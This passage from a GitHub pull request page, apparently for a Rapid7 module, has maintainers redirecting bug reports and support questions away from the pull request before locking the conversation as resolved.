Second of all, this is the pull request for the module, not a bug tracker. If you have bugs, please file them as issues. If you have support questions, ask on Slack, IRC, e-mail, or, if you're convinced GitHub is the place to be, ask via an issue. We will label it as question. This pull request is over.

Thank you.

@rapid7 rapid7 locked as resolved and limited conversation to collaborators Oct 11, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Oct 11, 2019

Please read our CONTRIBUTING document. We would be happy to help everyone, just not here. Conversation on this PR is limited to development.

ETA: We've updated the document to clearly state where questions shouldn't go. Previously, it was stated where they should go and only implied where they shouldn't go. Thanks.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
You can’t perform that action at this time.